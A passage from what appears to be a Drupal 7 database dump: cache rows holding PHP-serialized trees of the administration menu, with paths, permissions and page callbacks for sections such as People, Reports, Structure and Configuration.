roles.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-5\";s:5:\"depth\";s:1:\"4\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:2:\"49\";s:2:\"p4\";s:3:\"118\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:40:\"a:1:{i:0;s:22:\"administer permissions\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:34:\"a:1:{i:0;s:16:\"user_admin_roles\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:24:\"admin/people/permissions\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:5:\"Roles\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:30:\"List, edit, or add user roles.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}}s:10:\"node_links\";a:0:{}}',0,1423658773,1),('links:management:tree-data:en:f891d82361c3febd2be0d3ed636d72e7a66212bcbd0bba0b4cb638d484bdbb1f','a:2:{s:4:\"tree\";a:1:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:14:\"Administration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:11:{i:7;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"7\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:16:\"admin/appearance\";s:11:\"router_path\";s:16:\"admin/appearance\";s:10:\"link_title\";s:10:\"Appearance\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"Select and configure your themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-6\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"7\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer themes\";}\";s:13:\"page_callback\";s:18:\"system_themes_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:16:\"admin/appearance\";s:5:\"title\";s:10:\"Appearance\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"Select and configure your themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:8;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"8\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/config\";s:11:\"router_path\";s:12:\"admin/config\";s:10:\"link_title\";s:13:\"Configuration\";s:7:\"options\";s:70:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:20:\"Administer settings.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"8\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:24:\"system_admin_config_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/config\";s:5:\"title\";s:13:\"Configuration\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:20:\"Administer settings.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:9;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"9\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/content\";s:11:\"router_path\";s:13:\"admin/content\";s:10:\"link_title\";s:7:\"Content\";s:7:\"options\";s:82:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:32:\"Administer content and comments.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-10\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:1:\"9\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:41:\"a:1:{i:0;s:23:\"access content overview\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"node_admin_content\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/content\";s:5:\"title\";s:7:\"Content\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:32:\"Administer content and comments.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:11;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"11\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/dashboard\";s:11:\"router_path\";s:15:\"admin/dashboard\";s:10:\"link_title\";s:9:\"Dashboard\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View and customize your dashboard.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-15\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"11\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"access dashboard\";}\";s:13:\"page_callback\";s:15:\"dashboard_admin\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/dashboard\";s:5:\"title\";s:9:\"Dashboard\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View and customize your dashboard.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:12;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"12\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:10:\"admin/help\";s:11:\"router_path\";s:10:\"admin/help\";s:10:\"link_title\";s:4:\"Help\";s:7:\"options\";s:98:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:48:\"Reference for usage, configuration, and modules.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"9\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"12\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:9:\"help_main\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:10:\"admin/help\";s:5:\"title\";s:4:\"Help\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:48:\"Reference for usage, configuration, and modules.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:13;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"13\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/index\";s:11:\"router_path\";s:11:\"admin/index\";s:10:\"link_title\";s:5:\"Index\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-18\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"13\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:18:\"system_admin_index\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Index\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:16;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"16\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/modules\";s:11:\"router_path\";s:13:\"admin/modules\";s:10:\"link_title\";s:7:\"Modules\";s:7:\"options\";s:76:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:26:\"Extend site functionality.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-2\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"16\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:36:\"a:1:{i:0;s:18:\"administer modules\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"system_modules\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/modules\";s:5:\"title\";s:7:\"Modules\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:26:\"Extend site functionality.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:18;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"18\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:12:\"admin/people\";s:11:\"router_path\";s:12:\"admin/people\";s:10:\"link_title\";s:6:\"People\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Manage user accounts, roles, and permissions.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-4\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"18\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:34:\"a:1:{i:0;s:16:\"administer users\";}\";s:13:\"page_callback\";s:10:\"user_admin\";s:14:\"page_arguments\";s:21:\"a:1:{i:0;s:4:\"list\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:12:\"admin/people\";s:5:\"title\";s:6:\"People\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Manage user accounts, roles, and permissions.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:19;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"19\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:13:\"admin/reports\";s:11:\"router_path\";s:13:\"admin/reports\";s:10:\"link_title\";s:7:\"Reports\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View reports, updates, and errors.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"5\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:13:\"admin/reports\";s:5:\"title\";s:7:\"Reports\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View reports, updates, and errors.\";s:15:\"in_active_trail\";b:1;}s:5:\"below\";a:13:{i:42;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"42\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/fields\";s:11:\"router_path\";s:20:\"admin/reports/fields\";s:10:\"link_title\";s:10:\"Field list\";s:7:\"options\";s:89:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:39:\"Overview of fields on all entity types.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"42\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:42:\"a:1:{i:0;s:24:\"administer content types\";}\";s:13:\"page_callback\";s:20:\"field_ui_fields_list\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/fields\";s:5:\"title\";s:10:\"Field list\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:39:\"Overview of fields on all entity types.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:50;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"50\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/dblog\";s:11:\"router_path\";s:19:\"admin/reports/dblog\";s:10:\"link_title\";s:19:\"Recent log messages\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View events that have recently been 